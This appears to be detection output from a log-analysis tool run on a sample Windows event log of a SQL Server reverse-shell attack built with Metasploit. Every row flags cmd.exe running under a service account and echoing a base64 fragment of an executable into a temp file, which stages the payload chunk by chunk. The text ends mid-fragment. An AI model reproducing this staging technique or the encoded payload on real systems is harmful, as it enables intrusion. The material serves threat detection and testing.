/Vk1NqAFZTV2gC2chf/9UBwynGde7DgKJAAEiLAIvoDPj//13CBABADCGQkMGQkKacwgQAkJCQF4yQkCiokJBVi+yLOUmLrxSFQXQzi0257VD/FSrAQACFuXUe74uZmMBAABdqhcB1BV5dwggA/9a0gPwKAF5dwggAM8BdwggAuDtORgBdwggAkJCQkIyQkMOQ2L+QkMOQkJCQkJBFkJBViySDPUcIEABtfCNoKAdBUv8VQMBMAItFA2gxV0Bkjrpe>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:19.857 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo zgBohQecAFDoobH//zMMXcOQkJCQQ4+Q/JCQkLyQaCgHQez/FTzAQAAzwMOQkFWL7ItFCIvIgeEAAADAgfnLAADALgypAAD/P7gFAAAAdAW4xAAAql3DZpAXkJCQkKCL7EhFFFaIdXgZ2CjA09hIUDHMFFD/FZzAnwAj14lFFEVLi6Y1qU0RUVL/FSTAQIqFwHRKi6oMi00UhcB0AokIi1XAhdJ0C1Hogv///4PEpokCi5YUUP8V/cBAv8exFNq0AHO4dREBAKBdwhAAZgJz1wBaCrh2EQEAXiXCEHEkNZjAQF8s1oXAdQVeXcIQAP/WBYD8CgBeZcIaAJCQkAkL9uyLTRCLRQiFyVZ0HI10CP87xnMRi1UMigqEyegIdAlAXDvGcvLGAJReXcLLAJBViyNTIdyowXIAVleLgQhqL1f/02pcV4vw/9ODxBA7xnbVi/CMMHUO3zpX/9Mu8IOjCIUDdAqNRgFMXltdwgS0i8dfXvFdwgQAkKaQkNBJkFVSMoPsGCyLXRCF21f5QfwAAAAAfROLRQwz24PuALcJi0yYBM6FyXX3jQSdBAAAAFZQ/xVcwUAAncQEi/j124l99H5Ei0UMwiArxxVd+IkwEOsDC0V3iykwUf9JicFAAIPEBECJBotV/APQi0X4gsYESInJ/IlF+ETZzUX8jURAAaWJRfzKnlztQOaixAQzyYXbiUUNi/B+VPhFDBxN9CvBi03IiUX0iekMeV2N6wOLRQB41fJN7I1N/IlV8Ik3iwQHUY1V8J9SqehZBQAAi038i0V1K8GDxwQD8ItFDEiJRQyz5ot99FVNrItF+McEjwUAjSbG/QAr8AN3UP8VIMFAQHpN+IPE/TsAD/AxK8GL10k0att+NosUhwNrshSHq2jD/fOLTQgSbIk5X1uL5V3Di1XyHsOJOl9biytdw4tFCIk4oMOiW8blucNkkJCQYFWL7KHc3UUAVpzAVw+F6QEA/2j4B0EAxwX4B0GelAAAAP8VIMBAAKH0CEEAg/gCD4W0AQAAoAwIQQC+kXxYADAbdDuLPUDBQAChdMFAAIM4RX4OM8mK4IoOUf/Xw44I6xGheMFA4zPSihaLCIoEUYPgEdvAdTaKRgHrhMB1y4sNtwgEAKH8tEEAg/ihD4JfAQAuD4RZARIAgwoEdWWD+VZzI7goAAA/6UoBAACAPgB0zVb/FajBQMqLyIPE7YkN4AgFAOu/d9u4rwAbAOklAQAAgPkDdze4K2YAAOm7AQAAg/kEdwq4LEQAAOkHATYAuiIAAL3C0RvAwGODwC3p9AAAlYP4BXVVoZzIQQCFwHUeqcl1/rgyAOAAA9gAAAAzwAf5Wg+VwINDM+nIE6QAg/gCegpNBwDdAOlyAAAAg/kBxAp6PFkAAOmqAAAAM8CD+YyhlRiDwD3pmgBfAIOXXPfYG8Ak9oM0UEqJQwAAg/gBdX+jjtb/AL52CFsAhMB0O4s9aMFA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:20.131 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo omN0wUAAzTgBfrkzyWoBig5R/wGDxAjrEaF4wUAAM9LNFhMIKgRRg+D9hcDCCIpG7EbEwITLoQAIQQCh+ApzEIoOM8CA+UMPncCNRAA34iGD+FoMEIoOM7WA+UEPncCNRDAO6wy4c3oAAOsFuAEAAACj3AhB34tVCJ2JAtU13AhBnzPAg/4BD53ASIclLk4AAF3DkJCWkJCQkJBVi+yLRQhWiwyF5AhBAA40heQIQQCFMW8XiwQcVMRAAFD/FRjAQACFwOsGdQNeqsOLkB6FwHQNiw5QUf8VHARAAF5dw4suDIsGUlBwFRzAQABeXcOQkM2QkJAMTpA7kJBVpuyD7OVTSdKLVqWLF/XSiVX4dQ5f6jPAmIuEXcIQAN5V+ItNFIM5cmDqi9pSM8CKBpGEwIl1CDMZBombixFGiRGLPBBmiTeDwQL6TRC0yAEAAIvIgeHABwAAgPmnD5yHoAAAmb/gJQAAvsiJVfAjz4Pbvp8AAAAz0jvPiXQEiVPsdTQ7PGkwi8dk07kBAAAA6NoNAAAL+AvaRoP+JQ91/NdIi0XsiwjwJccjyzvHdQQ7y3SFi0Xsi1Xwi8vP0YvrI0yLVfz31iPwjUIBiUX0UVH4hnEPhp0BOgC++gHzEnWzg0MeM//nx69nX164FgAAAFuLfgXCEAALgHUet0DHD6SVjIoC//+JKYz/AAAA9MQrI9OHzHTTiwblU/oCdRGD/g1WLW3JdSmYZAj2ACDrH4P6A3Uchcl/kXwFg/4E66qD/i11DIXJdQiLRcH2ADAfmal9FLgCAABvO8KLHxvA99hAO9gPgqr+//+F0nQ/iz8I6wOLVfyEJUo0B4lV6rgCgeLApwAAR4D6gIl9CA8hV///dg+k8QaD4D+ZweYG6WYLriTwi5z8hcCLyuXGEEWSR1X0K8JWMwyzyU8Cfxd8CIH+AAABAHMNvUUUixBKiRCLRRDrPItFFIsCFMP+gcYAAP//g9GSiRiL0YvGuQoAcszoeQwAAGaLyItFEBLN2IHm/wPLymaJCIPAAuPOANwAP2aJwbfAAh5FEIt9DLsHhcCJRfgPhfX9//9fl1uL5V3CEBNfXrh4AgEAW4vlXcJwAJCQkMKQkJDtkJAQrpD+VZzsg+wIi1XQU1ZXizqF/4m6/HUOxV4zwFvJ5V3CEL7EffyLRRSDmwAeNpd1CDPJZosOg8YCgfn/AAAAiXUIfRZPRc9lME6JA/ZFWIgIQIlFEOlJ5gAAi8Elz/wAAD0AgAAALIQeAQAAPQDYAAB1RoP/Ag+C/gAAAGaLBovQgUwA/AAAgfoAMQAAD4X1AADEgeH/AwAAJRIDAADB4QoLwYPGCJmLc4v6gcMAlwEAiXUIg7AA6weLwZnG2Iv6i8OL17kLAAAA6FULFQAIyL4BAAATC8p0EbkFAAAA6EALAACLyEYLynXvi1UUOzIPg8D//7y4AgAAO4tVDDvG3/b8G8n32W3Bg03/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:20.404 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo SBK5iQKLRdCLEBL7phCLeBCF9o1MMgHmgAAAAImNEHQwi8fR+u3CCYlF2YrDJD+JTdeSFQTXiAGLw7kGsGUAnNS+AMOLTfiL2ItF/E6L+nXQi1UMCtiIWf/+AoUuiUX8D4Wy/v//X6pbi+Vd0hAAX164eBEBAFtF5V3CPAB0kbgWAHEAW4vlXZoQAJCQkJCQkBWQ7Y+QgJBV5OyL3giD6ETkEP+zDDVAAMcAsScAADPAXcN9RRSLTRAvVVBQUVJMFFcAAIPEDF3DkJCQkJCQkJCQkJCQkJCQus/s3UUQi00Mg+0QcxD/kXjBQADHeBwAswAzwP3DU1ZbdQhXvwQAawCKFkY8Y4hFEHYai0UQu2QAUQAlCgCkAJn3+wQwiLwQiAFB6wQ8REMXi0UQuwoAAAA1/wBwAJn3+wQwiAFBisIEMIgBycYBLkFPdbWLRQxfXsZBvBZbXcNVi+yD7AwJSYt1d1eDPgB3EYsGAAAAAIzPM8Bbi+VdwgwAi10Ii0MY9sQCdGV/QwyFWXXpiwNqFFAV/+jQm2n/i0+JOIB4BInTCIkE81dXNol4IFeJvFf/FaDA1wCLUwyJ0mHiQwyLSMqFyXUlizW0wLxj/9aFwHUJX15bi+VdwgwA/9ZfwgCA/AoAW4vlhcIMAOpDMIOfMDvHi0UMdCiKmDCICIsWQEqJFol7MIsOiUUMhcl1Ecf9ActRAF9eM8Bbi+VdwgyqikssVzcPhDUBAACLU1iLPlKJ3EuJ5/jonaJ2/4PbSAF1LVOBkQNrADPJiUUIOxh0T4tDWFDomPP//4tFCF9eW4vlXcIMAIlLPIlLSIlLRMdFCAAAAFR8A4t9+IX/GIadAHgA4Us8OkNEO8hyN4tDQItLOO5VGlIgUfXo6gAAAItNzzuXB8QQO/iJRQh0ZFX4UItDVAPxiUtEE8KJc1CJ2FQEUzyLU4SLQ0Q4wjn4dwKLoouBOKdE/ET4A/LUSMHpAodTi8qPVfyD4QMD3fOkAHMsdE34bPAryItFCIlbdyZ1EPpVpoWmiWH4D4S8////Ew49JxEBADBnx0PNAdsAWHFF/ItNDK3BiQbsB8dFCAAnAACLQ1iUbQ3z//8XRQhfBFvD5V02XQCLFitNDFFSUGjoMwAAAIMkED1+EQF4iUUIVQfHQygBPwAAi0UmX4kGi0UIXluL5V3CDACVkJCQ8pCQC/+QkJCQkFUQGIuLyggci30Qi0YQi04UC8HHRRIAAAAAdXOKRgiE7HTVi1YEjSgIagBRagBqAGoA3v8VDMBAAB3GdTWLNZjAQAD/mIXAdQmLTRRfXg9CvcP/1gWA/AoAPe12TgBrBbh+PgGAi5QUX16QAQCsABdd6IvqCIXAdQ6LLhRfXokCuAtmAABdw+T4dgJm+ItGDIVDdCOKTgiZyXUci05QiUgIi0ZQi70nuSAAAADo3wbOAItWDImS2PBGDBPwDFONTRBQi0Y/UVeRUP8V>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:20.678 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo EMBAS/vAjAczwPeJAQAAiz2YwEAAutdAfg+EG9oAAGLXBYD8CgA9ZQALAA+F/QCfAIsdnMBAAItOJYtGEIX4fBZ/HYXAdhBqABHoAwAAUc5w8AM3AOsNI8GD+P912wtf6wK1wIvSyLSLUaBS/9OLxoH/gAAAAOq/hf+4MaGECUEAi14EmsB1GFBo7ABBAC5AYRb//zHE96Ng1/oAhcB0BVP/0OtlaoGRKd43sgCLTgyDVgSNlxBqcYVR/98VksBA2cHA1QQzwOtxix2YwEAAWNOFwHRl/9OUKfwKAD1kAH35dAc9YwAhAOEsgf8CAQAAdRKLTRSLVRBOX7g8EQEAieZeXcM97fwKAJ0Si03qi1UQ7V/28xEBALIRCF3DPaZbCgD4EvpNFIsnEFtfuH4RATyJEV5dw4XAdTiLTRCFyXUSi00Uiw8QW1+4fugBAIkRJ13Di1YMhdJ0GIp1CIRodRF2VlADV4tOVH/Ren1xUIlOVAFNJYtVEFtfiRFe+TuQkJCQkJBVpexRVovtzoqELITAD4RCAAAAzE7RM8BTg/kB54lF/IlF/w+lnAAAAIvUPOX4D4SROAAA214zg///dgXPyP/rAgpLi1bwjU38agBRUFNS/xUUwEAAhcB0L4uL/ItWUItOVPfQg9EAK/gD2IlWUIX/iU5Ud8IXtAhfx0Y8AAAGsFueG+VdwgQAiz2YwEAA/9eFwHUFiUUI6wqf1wWAJAoAiUUIREX8i1ZQi/FUFtCLRQiJiFCD0QCFwPBOVHUHx+DZAABLAItFCF9bIYtrXcIEgTPAXovlmsIhB0wbkJCQkFWLoItFCI1IArhWVVVB9+mLysHpHwPRjQSVAQDfAF3CBACQkJCQDdg64JCQkCGQkFWLJItFEItNDIsdCChRUugMAAAAB8IMHZCQtpCQ0pCQVYuui1UQiUUIHFaNSv4z9leLfQyFyX5rStIzXwgUN4PGA8HqAkCK94/NQOWwUP+0njf9amQ3/oPiYtbiusHrCsDTM9tAipLex6oAoFBXihA3/opcN/+D4g/B4gIRDQbF00CEkhhpxs+IUP+KVDf/g+I/QDvxipIYxzYAiFD/fJgb+xc78n1fM8mKDD7B6QI7SoqJGMdAADvyiP3/DRQ+dXaD6APB4gRAincZ/kAAiDD/xgA96yu87j4BM9uD4gOKGcHiBMHrBAtvJYr0rMdAAIhQ/4oJg+EPihSNGMdAAIgQQBkAt0CLVeX/AAArwpdez1tdwgwAkDI4kJCQkJCQT4M9WEBBAP8pDP90JAT/a/jAQDlZw2hL/UEAplhUQQBAdCQM6JcDAABxxAzD/3Qk/qHL////99gbwFn3m0gsnMyLRCQIi0wkEAtLfnskDHUJi2IkBPfhwhAAU/fhi9iLRCQI92QkrgOEi0kkEffhA83PwhAAzMxkzMzMzMzMzMzM/yVAwUAAzIDMzMzMzOPMzFf1U63/i0TaFAvEfUVH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:20.951 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo i1QkEJLY99oV2OOJZyQUiVQkOrxEJBwLwH0Ufr50JBj32Pfag9gAiUQkHIlnJBgLwHUYi0y5GIsFJJgz0veIi9gqRCR09zOLs3FBie2LTCR+i0EkFC6yJCXR614h0dvR2AvbdfT38Yvw92QkoovIi0QkGPfmA9ELDjtUJBR30HIHO0R3+HYBTjPSi79PjQf32vdGHdoAW15fwhAAVYvsav9oYMf8AChIuUAAd6EAAAAAUGSJJQAAAADlGiBTVleJZeiD6zgAagH/FdCrQN1+BQ1UQFwAlYMNWEBBAP+3FdTAQH6LDZgLQQCJCP8V2MBAAIsNSAtBAIkIodwOQACLAKMlQEEA6J/nAACDMVANQQAAdQyJ1LlAAP8V4MBCAFnocAKTAGgMhUAARyHQbgDoWwIAAKGQXV4AiUXYjR7YUP81jAtBAI1F4FCNRdSDjUXke/+f6MBAMWjr0EAAaABf/OvoWgIAAP8VzcBAAIth4Ilm/3Xg/3XU/3Xk6ONYk9NBxDCpRdxQ/5S4wUAAi0Xsi1yLCYlN0FBR6OsBlwDHWQOLZej/ddD/FfTAQADMhczMzN3HVzMyi0SIEAvASBRIi+EkYffY99qD2ACJRCQQiXUkmpVEJBgLwH0TUVQkFNnY99qD2AArRCQYiVQkFAtedfaLTMoUi0QkEOXa9/ELRCQM9/GdnzPST3lO61OL2ItMJBSLVCQGi0QkDNGj0dnRc9HYC9t19Pfxi8j3ZCQYkfdkvBQDxsMOO1QkWXcIcr47RCQMdv/BRHwUm1ReGCsKdgwbVCQQT3kH94T32IPagNlbwhAAzMzMzMzMIKigzMwtzMyAp0BvFoD5a3MGD6/Q0/obi0XBSYSA4RXT+MPB+h+LwtPMzMzMzMzMzMzMzMxF28xRPQAQAACNOyTochSB6QCkADQtABAwlNF5PQAQAABz7CvIi7KF14vhiwiLrgRQXcyAbkBzFYD5IHMGD8fCbTPDhtAzwIDh0NPiwzPAM9LDzFNWi8UkGAtidRiLTAgUi0QkEDrS98qL2M5EJAz38YvT67aLyFBcJBSLVCQQi0QkDNPp0dvR6tF9C8l19PfzA/D3ZCQYi8iLRCQUouYD0XIOO7WgzXcIcgc7RCQMdgFOPtKLxuNbwhAAzB/MzHPMzMyA+UBzFYD5oHMGDzXQ03PDiw7O0oBBH9NPwzPAM9LDzP8l/MBAAP8l8MBAAP9k5MBAAGgAAANNaAAMAR1tDQAASVmZdDPAw8P/Jcy+WQD/JYTB8gDMzMzMzMjMzMzMzMz/0szBQM8AAAAAAEMAAEIAAAAINAAAANEAAMcAAD4AAAAAAAAAPwAAAOUAfQAAACmdAAAAAJQ4xQAAAP0AKwAAAAAAAACXAAAAAACYAABMAAAAcgAAAAAAAAAAAAAAABIAAAAAAAAAAAAAAAAAAAAUAAAA7QC1AAAAYVEcAAAAewAAAAAAtgAAAPoAAAARAABN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:21.224 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAA9gAAeAAAAAAAAAAAAAAAAAAAAAC87QAAAAAA7wAAAAAAAAAAAAAAAAAAAAAAAAAAAI8AAAAAAAAAAAAAAAAAAL4AAAAhAAAAAAC7ADAAAAAANAAAAAAAqAAAAAAA+wAAACMAAAA9AAAAAAB3AAAAAAAAAAAAACwAAADRB6EAAAAAAAAAqwAA7OGiAAAAAAAAAAAAAAAAAOMAAAAAAAAAAAAAAAAAAAAAAFEAAABqAAAAfwC7AAAAAAAAAAAAAAAAAAAAM2cAAOkAAAAAXQAAAADvAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAALQAAAAAAAAAAAADNAAAAAAAAAAAAAAAAAAAhAAAAAG9eAAAAGQAAAAAAAAAgACsAAAAAARoAAAAAfAAAAEo6AAAAAEW+AH8AAAAAAADcAACFAAAAAAAAAAAAAADsAAAAdwAAAAAAAADuNgAAqgAAAAAAAAAAAHAAAMOHVWQAZmEAAAAAAAApALAAAD/8AAAAAADaAAAAAIQAAAAAaAAAAAAAAAAAAAAATQAAAAAAANdHAAAAiQDCAAAAAAAAAAAAAAAAAOkqAACBAAAAAMEAAAAAAAAAAAAAAAAAAAAAoAAAAABEAAAAAACAYTAAAAAAAAAAAAAA8ADDqtUAAAAAAAAATQAAAD8AAAAAAAAAAADUAAAAAAAAAPIAAAAAAADo4wAAAKQAAAAAAAAAACiYAAAA9osALQAAAAAAALYAAAAAAOEAAADjLwAaAAAAAAAAAI0AAAANAP4AAAAAAPthAAAAswBjAAAAVwAAAAAAAAAAAAAAAAAAAAAAALoAAAD5AABKAAAAAABsAAAAAAAAAAAAAAAAAADyAAAAAAAAAAAAvQAAAAAAAF4AAAAAAAAAAAAAzQAAAAAqAAAAXAB2owAAAAAAAABHugDXAAAAAAAXAAAATAAJKwAAAABuAPAAhgAAAACpvQAAAPiAAAAAAAAArgAAAAAAAADbAAAAALsAAOUAAAAAAHIAAAAAAJIAAAAAAt4AoQDuAFUAAAAAAAAA+QDoAAAAAAAAiQBLAAAAIwAAMAAAAAAAAEAVAOwAAADpAAAADCsAAOkAAAAAAAAAAAAAAADGAAAAAAAAaAAAAAAAAFkAAAAAAADsAAAAExIAAAAAAK0AAAAAAAAAAAAoAAAAcTkAAACyAABgAMIAADcAAAB3AAAAAAAAADYAAAAAAAAAAAAAAIxUYVgAAAAAAAAAAAAAAACtAAAAAAAAAADNAGoAAAAAAAAAAAAAAABtAFgAAAAAAAAAAAAAAAAAAAAPAG0AAABUAAAAAAAAAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAAPAAAA4QCfAAAAAAAAAACBAAAAUAAAAAAAAAAAAAAAAAAAAPMA/gCRAAAAAgAAALaYNwCQAAAAGgAAW6QAPF0AAAAAAAAAAAAAAAAAAMEAWJIAABwAAABs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:21.498 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AADBAAAAAAAAAAAAAAAAAAAA2pcWAFUAAAAAAAAWAAAAAACGAABWAAASAABIAAAEAAAAAAAAAAAAAAAAANQAAADkAAAAALgAuiMAAAAAAOQAAACYAO8AAAAAAAAAAAAAAAAAAAAAAAAAAACKAAAAAAAAAAAgLQAAdwAAAAAAAAAAAAAAAGsAAAAAAI0AAAAAAGsAAADgAAAAAAAAAABYAAAAAO2gAAAA3gAAAAAAVSIAAABPAAAAXgAAAAAAAAAAAAAAAAAAAAAAAAB/1wCEADwAAAAAAJ0AAAAAALkAAAA+rjcAAAAAAAC0bwAAAACLAAAAAAAAAAAAAAAAAAB8AJ8AAAAjBQAAUAAAAAAAoAAAAAAAAAAAAAAAAAAAAGD0AAAAAADgAAAAAAAAAAAAAAB/AAAAAAAAAAAAAAAAAAAAAAAA8wAAAAAAAAAATgAAAAAAxmsAAAAAPwAAAAAAAAAAAFQAAABSDAAAp1oAAAAAAAAAKwAAAJMAnQDkAADRAAAhAAARAAAAAAAAAFwAXQCjpAAAAAAAAOsAAAAAAAAAAABLAAAAAAAAAAAAAAAAAAAOAAAhGhZPAAAAjM8AAHDPAAAAAAAAUs8AAEbPAAA6zwAAKs8AABjPAAAIzwAA8s4AAN7OAADGzgAAus4AAKrOAACSzgAAes4AAF7OAABOzgAAQM4AAPrLAAAKzAAAJMwAAD7MAABMzAAAXswAAGrMAAB0zAAAhswAAJrMAACyzAAAwMwAANrMAADyzAAADM0AACbNAAA+zQAAYM0AAGjNAAB6zQAAis0AAKDNAACwzQAAwM0AANLNAADgzQAA7s0AAATOAAAWzgAANM4AAAAAAADEyQAA2MsAAMbLAAC4ywAAqMsAAJjLAACEywAAeMsAAGjLAABYywAASssAAELLAAA4ywAAKssAABTLAAAKywAAAMsAAPbKAADsygAA4MoAANjKAADOygAAxMoAALTKAACkygAAmsoAAJLKAACIygAAfsoAAHTKAABsygAAZMoAAFzKAABSygAASMoAAD7KAAA0ygAAKsoAACDKAAAWygAACsoAAALKAAD6yQAA6skAAODJAADWyQAAzMkAAOzLAADczwAA0M8AAAAAAAC6zwAAsM8AAAAAAAAHAACABAAAgAkAAIA0AACADgAAgAwAAIAVAACAFwAAgAMAAIASAACACgAAgJcAAIBzAACAdAAAgG8AAIAAAAAAAAAAADaAwUoAAAAAAgAAAEoAAAAAAAAAACABAAAAAAAAAAAAAADgP3sUrkfheoQ//Knx0k1iUD8AAAAAAABQPwAAAAAAQI9AAAAAAAAA8D8AAAAAAAAAAI3ttaD3xrA+AAAAAB8AAAA7AAAAWgAAAHgAAACXAAAAtQAAANQAAADzAAAAEQEAADABAABOAQAAMgEAAFEBAAAAAAAAHwAAAD0AAABcAAAAegAAAJkAAAC4AAAA1gAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:21.772 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo APUAAAATAQAAKG51bGwpAAAwMTIzNDU2Nzg5YWJjZGVmAAAAADAxMjM0NTY3ODlBQkNERUYAAAAAMDEyMzQ1Njc4OWFiY2RlZgAAAAAwMTIzNDU2Nzg5QUJDREVGAAAAAAAAAAAAACRAAAAAAAAAJMC4HoXrUbieP5qZmZmZmbk/FCcAADz5QAAZJwAALPlAAB0nAAAY+UAAHicAAAz5QAAmJwAA+PhAACgnAADg+EAAMycAAMj4QAA0JwAArPhAADUnAACM+EAANicAAGz4QAA3JwAATPhAADgnAAA4+EAAOScAABj4QAA6JwAABPhAADsnAADs90AAPCcAAND3QAA9JwAArPdAAD4nAACM90AAPycAAGz3QABAJwAAVPdAAEEnAAA090AAQicAACT3QABDJwAADPdAAEQnAAD09kAARScAAND2QABGJwAAtPZAAEcnAACY9kAASCcAAHz2QABJJwAAZPZAAEonAABA9kAASycAABz2QABMJwAABPZAAE0nAADw9UAATicAAMz1QABPJwAAuPVAAFAnAACo9UAAUScAAJT1QABSJwAAgPVAAFMnAABs9UAAVCcAAFz1QABVJwAASPVAAFYnAAAw9UAAVycAAAz1QABrJwAA7PRAAGwnAADM9EAAbScAALD0QAB1JwAAkPRAAPkqAACA9EAA/CoAAFz0QAAAAAAAAAAAAEphbgBGZWIATWFyAEFwcgBNYXkASnVuAEp1bABBdWcAU2VwAE9jdABOb3YARGVjAFN1bgBNb24AVHVlAFdlZABUaHUARnJpAFNhdAA8AkEAMAJBACgCQQAgAkEAGAJBAAwCQQAwMTIzNDU2Nzg5AAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAEBAgEDAwMDAwMCAQEBAQABAQEBAQEBAQEBAAMCAQICAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAwIDAwEDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEDAgMDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQD5AQEA/NDU2Nzg5Ojs8PUBAQEBAQEAAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGUBAQEBAQBobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:22.047 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8AAAAAAAAAAP////8qt0AAPrdAAKzIAAAAAAAAAAAAAB7LAADIwAAA8McAAAAAAAAAAAAAYs8AAAzAAADkxwAAAAAAAAAAAACWzwAAAMAAAITJAAAAAAAAAAAAAKTPAACgwQAAeMkAAAAAAAAAAAAAxM8AAJTBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIzPAABwzwAAAAAAAFLPAABGzwAAOs8AACrPAAAYzwAACM8AAPLOAADezgAAxs4AALrOAACqzgAAks4AAHrOAABezgAATs4AAEDOAAD6ywAACswAACTMAAA+zAAATMwAAF7MAABqzAAAdMwAAIbMAACazAAAsswAAMDMAADazAAA8swAAAzNAAAmzQAAPs0AAGDNAABozQAAes0AAIrNAACgzQAAsM0AAMDNAADSzQAA4M0AAO7NAAAEzgAAFs4AADTOAAAAAAAAxMkAANjLAADGywAAuMsAAKjLAACYywAAhMsAAHjLAABoywAAWMsAAErLAABCywAAOMsAACrLAAAUywAACssAAADLAAD2ygAA7MoAAODKAADYygAAzsoAAMTKAAC0ygAApMoAAJrKAACSygAAiMoAAH7KA